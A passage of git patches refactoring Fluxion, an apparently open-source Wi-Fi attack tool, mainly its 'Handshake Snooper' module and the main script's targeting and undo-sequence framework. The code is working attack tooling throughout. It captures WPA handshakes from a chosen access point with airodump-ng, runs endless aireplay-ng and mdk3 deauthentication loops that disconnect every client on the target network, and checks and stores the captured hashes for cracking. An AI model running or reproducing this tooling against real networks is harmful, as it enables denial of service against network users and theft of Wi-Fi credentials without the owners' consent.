"#CCCCCC" -title "Handshake Snooper Arbiter Log" -e "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & + xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg "#000000" -fg "#CCCCCC" \ + -title "Handshake Snooper Arbiter Log" -e \ + "tail -f \"$FLUXIONWorkspacePath/handshake_snooper.log\"" & local handshake_snooper_arbiter_daemon_viewerPID=$! - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStartingArbiterNotice" >"$FLUXIONWorkspacePath/handshake_snooper.log" + local now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperStartingArbiterNotice" > \ + "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_start_captor handshake_snooper_start_deauthenticator @@ -46,26 +68,38 @@ function handshake_snooper_arbiter_daemon() { # Keep snooping and verifying until we've got a valid hash from the capture file. while [ $handshake_snooper_arbiter_daemon_verified -ne 0 ]; do - echo -e "[$(env -i date '+%H:%M:%S')] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $(io_dynamic_output $HandshakeSnooperSnoopingForNSecondsNotice)" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" sleep $HANDSHAKEVerifierInterval & wait $! # Using wait to asynchronously catch flags while waiting. # If synchronously searching, stop the captor and deauthenticator before checking. if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" ]; then - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperStoppingForVerifierNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperStoppingForVerifierNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" handshake_snooper_stop_deauthenticator handshake_snooper_stop_captor - mv "$FLUXIONWorkspacePath/capture/dump-01.cap" "$FLUXIONWorkspacePath/capture/recent.cap" + mv "$FLUXIONWorkspacePath/capture/dump-01.cap" \ + "$FLUXIONWorkspacePath/capture/recent.cap" else - pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &>$FLUXIONOutputDevice + pyrit -r "$FLUXIONWorkspacePath/capture/dump-01.cap" \ + -o "$FLUXIONWorkspacePath/capture/recent.cap" stripLive &> \ + $FLUXIONOutputDevice fi - echo -e "[$(env -i date '+%H:%M:%S')] $HandshakeSnooperSearchingForHashesNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" - hash_check_handshake "$HANDSHAKEVerifierIdentifier" "$FLUXIONWorkspacePath/capture/recent.cap" "$APTargetSSID" "$APTargetMAC" + now=$(env -i date '+%H:%M:%S') + echo -e "[$now] $HandshakeSnooperSearchingForHashesNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" + hash_check_handshake "$HANDSHAKEVerifierIdentifier" \ + "$FLUXIONWorkspacePath/capture/recent.cap" \ + "$APTargetSSID" "$APTargetMAC" handshake_snooper_arbiter_daemon_verified=$? # If synchronously searching, restart the captor and deauthenticator after checking. - if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then + if [ "$HANDSHAKEVerifierSynchronicity" = "blocking" -a \ + $handshake_snooper_arbiter_daemon_verified -ne 0 ]; then sandbox_remove_workfile "$FLUXIONWorkspacePath/capture/*" handshake_snooper_start_captor @@ -78,33 +112,38 @@ function handshake_snooper_arbiter_daemon() { handshake_snooper_stop_captor local completionTime=$(env -i date '+%H:%M:%S') - echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >>"$FLUXIONWorkspacePath/handshake_snooper.log" - echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >>"$FLUXIONWorkspacePath/handshake_snooper.log" + echo -e "[$completionTime] $HandshakeSnooperArbiterSuccededNotice" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" + echo -e "[$completionTime] $HandshakeSnooperArbiterCompletedTip" >> \ + "$FLUXIONWorkspacePath/handshake_snooper.log" # Assure we've got a directory to store hashes into. mkdir -p "$FLUXIONPath/attacks/Handshake Snooper/handshakes/" # Move handshake to storage if one was acquired. - mv "$FLUXIONWorkspacePath/capture/recent.cap" "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" + mv "$FLUXIONWorkspacePath/capture/recent.cap" \ + "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" # Signal parent process the verification terminated. kill -s SIGABRT $1 } -function handshake_snooper_stop_captor() { - if [ "$HANDSHAKECaptorPID" ]; then kill -s SIGINT $HANDSHAKECaptorPID &>$FLUXIONOutputDevice +handshake_snooper_stop_captor() { + if [ "$HANDSHAKECaptorPID" ]; then + kill -s SIGINT $HANDSHAKECaptorPID &> $FLUXIONOutputDevice fi HANDSHAKECaptorPID="" } -function handshake_snooper_start_captor() { +handshake_snooper_start_captor() { if [ "$HANDSHAKECaptorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi handshake_snooper_stop_captor - xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ + xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" \ + $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor & local parentPID=$! @@ -115,14 +154,14 @@ function handshake_snooper_start_captor() { done } -function handshake_snooper_stop_deauthenticator() { +handshake_snooper_stop_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then kill $HANDSHAKEDeauthenticatorPID &>$FLUXIONOutputDevice fi HANDSHAKEDeauthenticatorPID="" } -function handshake_snooper_start_deauthenticator() { +handshake_snooper_start_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi @@ -130,75 +169,90 @@ function handshake_snooper_start_deauthenticator() { # Prepare deauthenticators case "$HANDSHAKEDeauthenticatorIdentifier" in - "$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" >$FLUXIONWorkspacePath/mdk3_blacklist.lst ;; + "$HandshakeSnooperMdk3MethodOption") + echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; esac # Start deauthenticators. case "$HANDSHAKEDeauthenticatorIdentifier" in - "$HandshakeSnooperAireplayMethodOption") - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & - HANDSHAKEDeauthenticatorPID=$! + "$HandshakeSnooperAireplayMethodOption") + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ + -title "Deauthenticating all clients on $APTargetSSID" -e \ + "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & + HANDSHAKEDeauthenticatorPID=$! ;; - "$HandshakeSnooperMdk3MethodOption") - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & - HANDSHAKEDeauthenticatorPID=$! + "$HandshakeSnooperMdk3MethodOption") + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ + -title "Deauthenticating all clients on $APTargetSSID" -e \ + "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & + HANDSHAKEDeauthenticatorPID=$! ;; esac } -function handshake_snooper_unset_deauthenticator_identifier() { +handshake_snooper_unset_deauthenticator_identifier() { HANDSHAKEDeauthenticatorIdentifier="" } -function handshake_snooper_set_deauthenticator_identifier() { +handshake_snooper_set_deauthenticator_identifier() { if [ "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 0; fi handshake_snooper_unset_deauthenticator_identifier - local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption") + local methods=( + "$HandshakeSnooperMonitorMethodOption" + "$HandshakeSnooperAireplayMethodOption" + "$HandshakeSnooperMdk3MethodOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$HandshakeSnooperMethodQuery" methods[@] HANDSHAKEDeauthenticatorIdentifier=$IOQueryChoice echo - if [ "$HANDSHAKEDeauthenticatorIdentifier" = "$FLUXIONGeneralBackOption" ]; then + if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ + "$FLUXIONGeneralBackOption" ]; then handshake_snooper_unset_deauthenticator_identifier return 1 fi } -function handshake_snooper_unset_verifier_identifier() { +handshake_snooper_unset_verifier_identifier() { HANDSHAKEVerifierIdentifier="" } -function handshake_snooper_set_verifier_identifier() { +handshake_snooper_set_verifier_identifier() { if [ "$HANDSHAKEVerifierIdentifier" ]; then return 0; fi handshake_snooper_unset_verifier_identifier - local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") + local choices=( + "$FLUXIONHashVerificationMethodPyritOption" + "$FLUXIONHashVerificationMethodAircrackOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@] echo case "$IOQueryChoice" in - "$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifierIdentifier="pyrit" ;; - "$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifierIdentifier="aircrack-ng" ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_identifier - return 1 - ;; + "$FLUXIONHashVerificationMethodPyritOption") + HANDSHAKEVerifierIdentifier="pyrit" ;; + "$FLUXIONHashVerificationMethodAircrackOption") + HANDSHAKEVerifierIdentifier="aircrack-ng" ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_identifier + return 1 + ;; esac } -function handshake_snooper_unset_verifier_interval() { +handshake_snooper_unset_verifier_interval() { HANDSHAKEVerifierInterval="" } -function handshake_snooper_set_verifier_interval() { +handshake_snooper_set_verifier_interval() { if [ "$HANDSHAKEVerifierInterval" ]; then return 0; fi handshake_snooper_unset_verifier_interval @@ -207,39 +261,92 @@ function handshake_snooper_set_verifier_interval() { io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@] case "$IOQueryChoice" in - "$HandshakeSnooperVerifierInterval30SOption") HANDSHAKEVerifierInterval=30 ;; - "$HandshakeSnooperVerifierInterval60SOption") HANDSHAKEVerifierInterval=60 ;; - "$HandshakeSnooperVerifierInterval90SOption") HANDSHAKEVerifierInterval=90 ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_interval - return 1 - ;; + "$HandshakeSnooperVerifierInterval30SOption") + HANDSHAKEVerifierInterval=30 ;; + "$HandshakeSnooperVerifierInterval60SOption") + HANDSHAKEVerifierInterval=60 ;; + "$HandshakeSnooperVerifierInterval90SOption") + HANDSHAKEVerifierInterval=90 ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_interval + return 1 + ;; esac } -function handshake_snooper_unset_verifier_synchronicity() { +handshake_snooper_unset_verifier_synchronicity() { HANDSHAKEVerifierSynchronicity="" } -function handshake_snooper_set_verifier_synchronicity() { +handshake_snooper_set_verifier_synchronicity() { if [ "$HANDSHAKEVerifierSynchronicity" ]; then return 0; fi handshake_snooper_unset_verifier_synchronicity - local choices=("$HandshakeSnooperVerifierSynchronicityAsynchronousOption" "$HandshakeSnooperVerifierSynchronicitySynchronousOption" "$FLUXIONGeneralBackOption") + local choices=( + "$HandshakeSnooperVerifierSynchronicityAsynchronousOption" + "$HandshakeSnooperVerifierSynchronicitySynchronousOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@] case "$IOQueryChoice" in - "$HandshakeSnooperVerifierSynchronicityAsynchronousOption") HANDSHAKEVerifierSynchronicity="non-blocking" ;; - "$HandshakeSnooperVerifierSynchronicitySynchronousOption") HANDSHAKEVerifierSynchronicity="blocking" ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_synchronicity - return 1 - ;; + "$HandshakeSnooperVerifierSynchronicityAsynchronousOption") + HANDSHAKEVerifierSynchronicity="non-blocking" ;; + "$HandshakeSnooperVerifierSynchronicitySynchronousOption") + HANDSHAKEVerifierSynchronicity="blocking" ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_synchronicity + return 1 + ;; esac } -function unprep_attack() { + +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if [ ! "$HandshakeSnooperCLIArguments" ]; then + if ! HandshakeSnooperCLIArguments=$(getopt --options="b:e:c:v:i:j:a" --longoptions="bssid:,essid:,channel:,verifier:,interval:,jammer:,asynchronous" --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@") + then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 10 + fi + + declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments + + eval set -- "$HandshakeSnooperCLIArguments" # Set environment parameters. +fi + + +# ============================================================ # +# ============= < Argument Loaded Configurables > ============ # +# ============================================================ # +while [ "$1" != "--" ]; do + case "$1" in + -b|--bssid) APTargetMAC=$2; shift;; + -e|--essid) APTargetSSID=$2; shift;; + -c|--channel) APTargetChannel=$2; shift;; + -v|--verifier) HANDSHAKEVerifierIdentifier=$2; shift;; + -i|--interval) HANDSHAKEVerifierInterval=$2; shift;; + -j|--jammer) exit;; + -a|--asynchronous) HANDSHAKEVerifierSynchronicity="non-blocking";; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < Fluxion Hooks > ==================== # +# ============================================================ # +attack_targetting_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" + done +} + +unprep_attack() { HandshakeSnooperState="Not Ready" handshake_snooper_unset_verifier_synchronicity @@ -250,39 +357,29 @@ function unprep_attack() { sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" } -function prep_attack() { +prep_attack() { mkdir -p "$FLUXIONWorkspacePath/capture" - while true; do - handshake_snooper_set_deauthenticator_identifier - if [ $? -ne 0 ]; then break; fi - handshake_snooper_set_verifier_identifier - if [ $? -ne 0 ]; then - handshake_snooper_unset_deauthenticator_identifier - continue - fi - handshake_snooper_set_verifier_interval - if [ $? -ne 0 ]; then - handshake_snooper_unset_verifier_identifier - continue - fi - handshake_snooper_set_verifier_synchronicity - if [ $? -ne 0 ]; then - handshake_snooper_unset_verifier_interval - continue - fi - HandshakeSnooperState="Ready" - break - done + IOUtilsHeader="handshake_snooper_header" - # Check for handshake abortion. - if [ "$HandshakeSnooperState" != "Ready" ]; then + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local sequence=( + "set_deauthenticator_identifier" + "set_verifier_identifier" + "set_verifier_interval" + "set_verifier_synchronicity" + ) + + if fluxion_do_sequence handshake_snooper sequence[@]; then + HandshakeSnooperState="Ready" + else unprep_attack return 1 fi } -function stop_attack() { +stop_attack() { if [ "$HANDSHAKEArbiterPID" ]; then kill -s SIGABRT $HANDSHAKEArbiterPID &>$FLUXIONOutputDevice fi @@ -292,12 +389,12 @@ function stop_attack() { HandshakeSnooperState="Stopped" } -function start_attack() { +start_attack() { if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi HandshakeSnooperState="Running" - handshake_snooper_arbiter_daemon $$ &>$FLUXIONOutputDevice & + handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice & HANDSHAKEArbiterPID=$! } diff --git a/fluxion b/fluxion index cba1b78..da23d2e 100755 --- a/fluxion +++ b/fluxion @@ -174,7 +174,7 @@ declare -r InstallerUtilsNoticeMark="$FLUXIONVLine" declare -r PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" -declare -r IOUtilsHeader="fluxion_header" +declare IOUtilsHeader="fluxion_header" declare -r IOUtilsQueryMark="$FLUXIONVLine" declare -r IOUtilsPrompt="$FLUXIONPrompt" @@ -483,7 +483,9 @@ fluxion_undo() { local -r __fluxion_undo__namespace=$1 - eval local -r __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + eval local __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) local __fluxion_undo__i for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ @@ -528,7 +530,10 @@ fluxion_do_sequence() { # defined above, including updating the namespace tracker. local -r __fluxion_do_sequence__namespace=$1 - local -r __fluxion_do_sequence__sequence=("${!2}") + + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local __fluxion_do_sequence__sequence=("${!2}") if [ ${#__fluxion_do_sequence__sequence[@]} -eq 0 ]; then return -2 @@ -1386,6 +1391,8 @@ fluxion_unprep_attack() { unprep_attack fi + IOUtilsHeader="fluxion_header" + return 1 # Trigger another undo since prep isn't significant. } @@ -1415,10 +1422,7 @@ fluxion_prep_attack() { fi fi - if ! prep_attack "$@"; then - fluxion_unprep_attack - return 1 - fi + if ! prep_attack "$@"; then return 6; fi } fluxion_run_attack() { @@ -1515,7 +1519,9 @@ fluxion_main() { fluxion_set_resolution - local -r sequence=( + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local sequence=( "set_language" "set_attack" "prep_attack" From 7c0af0586054109fdc6f565db8db4a3b78e423d4 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 16 Jan 2018 23:09:09 -0600 Subject: [PATCH 14/45] Global targetting & framework bug fixes. Targetting is now done via either "visual" interface or CLI flags. Fixed bugs with the undo sequencing in the sequencing framework. --- fluxion | 142 ++++++++++++++++++++++++++++++++++++++++++++------------ 1 file changed, 113 insertions(+), 29 deletions(-) diff --git a/fluxion b/fluxion index da23d2e..26729a8 100755 --- a/fluxion +++ b/fluxion @@ -78,8 +78,8 @@ source lib/HashUtils.sh # =================== < Parse Parameters > =================== # # ============================================================ # if ! FLUXIONCLIArguments=$( - getopt --options="vdkrnmtl:a:" \ - --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,language:,attack:" \ + getopt --options="vdkrnmtb:e:c:l:a:" \ + --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" ); then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 @@ -105,6 +105,9 @@ while [ "$1" != "--" ]; do -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; -m|--multiplexer) declare -r FLUXIONTMux=1;; + -b|--bssid) FluxionTargetMAC=$2; shift;; + -e|--essid) FluxionTargetSSID=$2; shift;; + -c|--channel) FluxionTargetChannel=$2; shift;; -l|--language) FluxionLanguage=$2; shift;; -a|--attack) FluxionAttack=$2; shift;; esac @@ -473,6 +476,8 @@ fluxion_do() { local -r __fluxion_do__namespace=$1 local -r __fluxion_do__identifier=$2 + # Notice, the instruction will be adde to the Do Log + # regardless of whether it succeeded or failed to execute. eval FXDLog_$__fluxion_do__namespace+=\("$__fluxion_do__identifier"\) eval ${__fluxion_do__namespace}_$__fluxion_do__identifier "${@:3}" return $? @@ -487,6 +492,9 @@ fluxion_undo() { # I've reported the bug, we can add it when fixed. eval local __fluxion_undo__history=\("\${FXDLog_$__fluxion_undo__namespace[@]}"\) + eval echo \$\{FXDLog_$__fluxion_undo__namespace[@]\} \ + > $FLUXIONOutputDevice + local __fluxion_undo__i for (( __fluxion_undo__i=${#__fluxion_undo__history[@]}; \ __fluxion_undo__i > 0; __fluxion_undo__i-- )); do @@ -494,8 +502,13 @@ fluxion_undo() { local __fluxion_undo__command=${__fluxion_undo__instruction%%_*} local __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} - if ! eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + echo "Do ${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier" \ + > $FLUXIONOutputDevice + if eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then + echo "Undo-chain succeded." > $FLUXIONOutputDevice eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) + eval echo History\: \$\{FXDLog_$__fluxion_undo__namespace[@]\} \ + > $FLUXIONOutputDevice return 0 fi done @@ -542,30 +555,36 @@ fluxion_do_sequence() { local -A __fluxion_do_sequence__index=() local i - for i in $(seq ${#__fluxion_do_sequence__sequence[@]}); do - __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i-1]}"]=$i + for i in $(seq 0 $((${#__fluxion_do_sequence__sequence[@]} - 1))); do + __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i]}"]=$i done # Start sequence with the first instruction available. + local __fluxion_do_sequence__instructionIndex=0 local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} while [ "$__fluxion_do_sequence__instruction" ]; do if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then - if ! fluxion_undo $__fluxion_do_sequence__namespace; then $__fluxion_do_sequence__namespace + if ! fluxion_undo $__fluxion_do_sequence__namespace; then break fi + + # Synchronize the current instruction's index by checking last. + if ! fluxion_done $__fluxion_do_sequence__namespace; then + return -3; + fi + + __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} + + if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then + return -4 + fi + else + let __fluxion_do_sequence__instructionIndex++ fi - if ! fluxion_done $__fluxion_do_sequence__namespace; then - return -3; - fi - - local __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} - - if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then - return -4 - fi - - __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence["$__fluxion_do_sequence__instructionIndex"]} + __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[$__fluxion_do_sequence__instructionIndex]} + echo "Next Instruction: $__fluxion_do_sequence__instruction" \ + > $FLUXIONOutputDevice done } @@ -1332,7 +1351,9 @@ fluxion_hash_get() { # ================== < Attack Subroutines > ================== # fluxion_unset_attack() { + local -r attackWasSet=${FluxionAttack:+1} FluxionAttack="" + if [ ! "$attackWasSet" ]; then return 1; fi } fluxion_set_attack() { @@ -1386,6 +1407,78 @@ fluxion_set_attack() { FluxionAttack=${IOQueryFormatFields[0]} } +fluxion_unset_attack_target() { + FluxionTargetMAC="" + FluxionTargetSSID="" + FluxionTargetChannel="" + + FluxionTargetEncryption="" + + FluxionTargetMakerID="" + FluxionTargetMaker="" + + FluxionTargetSSIDClean="" + + FluxionTargetRogueMAC="" + + return 1 # To trigger undo-chain. +} + +fluxion_set_attack_target() { + # Check if attack is targetted & set the attack target if so. + if ! type -t attack_targetting_interfaces &> /dev/null; then + return 1 + fi + + if [ \ + "$FluxionTargetSSID" -a \ + "$FluxionTargetMAC" -a \ + "$FluxionTargetChannel" \ + ]; then + fluxion_header + fluxion_target_show + echo + echo -e "$FLUXIONVLine $FLUXIONTargettingAccessPointAboveNotice" + + # TODO: This doesn't translate choices to the selected language. + while ! echo "$choice" | grep -q "^[ynYN]$" &> /dev/null; do + echo -ne "$FLUXIONVLine $FLUXIONContinueWithTargetQuery [Y/n] " + local choice + read choice + if [ ! "$choice" ]; then break; fi + done + + echo -ne "\n\n" + + if [ "${choice,,}" != "n" ]; then + return 0 + fi + elif [ \ + "$FluxionTargetSSID" -o \ + "$FluxionTargetMAC" -o \ + "$FluxionTargetChannel" \ + ]; then + # TODO: Survey environment here to autofill missing fields. + # In other words, if a user gives incomplete information, scan + # the environment based on either the ESSID or BSSID, & autofill. + echo -e "$FLUXIONVLine $FLUXIONIncompleteTargettingInfoNotice" + sleep 3 + fi + + if ! fluxion_get_interface attack_targetting_interfaces; then + return 2 + fi + + if ! fluxion_allocate_interface $FluxionInterfaceSelected; then + return 3 + fi + + if ! fluxion_get_target \ + ${FluxionInterfaces[$FluxionInterfaceSelected]}; then + return 4 + fi +} + fluxion_unprep_attack() { if type -t unprep_attack &> /dev/null; then unprep_attack @@ -1408,21 +1501,12 @@ fluxion_prep_attack() { source "$path/language/$FluxionLanguage.sh" source "$path/attack.sh" - # Check if attack is targetted & set the attack target. + # Check if attack is targetted & set the attack target if so. if type -t attack_targetting_interfaces &> /dev/null; then - if ! fluxion_get_interface attack_targetting_interfaces; then - return 3 - fi - if ! fluxion_allocate_interface $FluxionInterfaceSelected; then - return 4 - fi - if ! fluxion_get_target \ - ${FluxionInterfaces[$FluxionInterfaceSelected]}; then - return 5 - fi + if ! fluxion_set_attack_target; then return 3; fi fi - if ! prep_attack "$@"; then return 6; fi + if ! prep_attack "$@"; then return 4; fi } fluxion_run_attack() { From e37c200989b674c25388dcda2cb2a8b8612c841e Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 16 Jan 2018 23:14:04 -0600 Subject: [PATCH 15/45] Fixed parameter bug & removed localized targetting. --- attacks/Handshake Snooper/attack.sh | 26 +++++++++++++++----------- 1 file changed, 15 insertions(+), 11 deletions(-) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 2f9aff3..88b295b 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -308,8 +308,12 @@ handshake_snooper_set_verifier_synchronicity() { # =================== < Parse Parameters > =================== # # ============================================================ # if [ ! "$HandshakeSnooperCLIArguments" ]; then - if ! HandshakeSnooperCLIArguments=$(getopt --options="b:e:c:v:i:j:a" --longoptions="bssid:,essid:,channel:,verifier:,interval:,jammer:,asynchronous" --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@") - then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 10 + if ! HandshakeSnooperCLIArguments=$( + getopt --options="v:i:j:a" \ + --longoptions="verifier:,interval:,jammer:,asynchronous" \ + --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 10 fi declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments @@ -321,20 +325,20 @@ fi # ============================================================ # # ============= < Argument Loaded Configurables > ============ # # ============================================================ # -while [ "$1" != "--" ]; do +while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in - -b|--bssid) APTargetMAC=$2; shift;; - -e|--essid) APTargetSSID=$2; shift;; - -c|--channel) APTargetChannel=$2; shift;; - -v|--verifier) HANDSHAKEVerifierIdentifier=$2; shift;; - -i|--interval) HANDSHAKEVerifierInterval=$2; shift;; - -j|--jammer) exit;; - -a|--asynchronous) HANDSHAKEVerifierSynchronicity="non-blocking";; + -v|--verifier) + HandshakeSnooperVerifierIdentifier=$2; shift;; + -i|--interval) + HandshakeSnooperVerifierInterval=$2; shift;; + -j|--jammer) + HandshakeSnooperJammerInterface=$2; shift;; + -a|--asynchronous) + HandshakeSnooperVerifierSynchronicity="non-blocking";; esac shift # Shift new parameters done - # ============================================================ # # ===================== < Fluxion Hooks > ==================== # # ============================================================ # From 304939d0b9e146d7b56318670dc052fc9a8b3317 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 00:33:22 -0600 Subject: [PATCH 16/45] Upgraded Handshake Snooper attack plus bug fixes. Finished upgrading Handshake Snooper for Fluxion V4. Updated Handshake Snooper Fluxion service globals to newer identifiers. Added back-track checking to undo functions. Added Jammer interface selection step to Handshake Snooper sequence. Fixed bug failing to return error code with Fluxion's sequencing framework. --- attacks/Handshake Snooper/attack.sh | 60 ++++++++++++++++++++++------- fluxion | 2 +- language/en.sh | 10 ++++- 3 files changed, 56 insertions(+), 16 deletions(-) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 88b295b..283fa15 100755 --- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -94,7 +94,7 @@ handshake_snooper_arbiter_daemon() { "$FLUXIONWorkspacePath/handshake_snooper.log" hash_check_handshake "$HANDSHAKEVerifierIdentifier" \ "$FLUXIONWorkspacePath/capture/recent.cap" \ - "$APTargetSSID" "$APTargetMAC" + "$FluxionTargetSSID" "$FluxionTargetMAC" handshake_snooper_arbiter_daemon_verified=$? # If synchronously searching, restart the captor and deauthenticator after checking. @@ -122,7 +122,7 @@ handshake_snooper_arbiter_daemon() { # Move handshake to storage if one was acquired. mv "$FLUXIONWorkspacePath/capture/recent.cap" \ - "$FLUXIONPath/attacks/Handshake Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap" + "$FLUXIONPath/attacks/Handshake 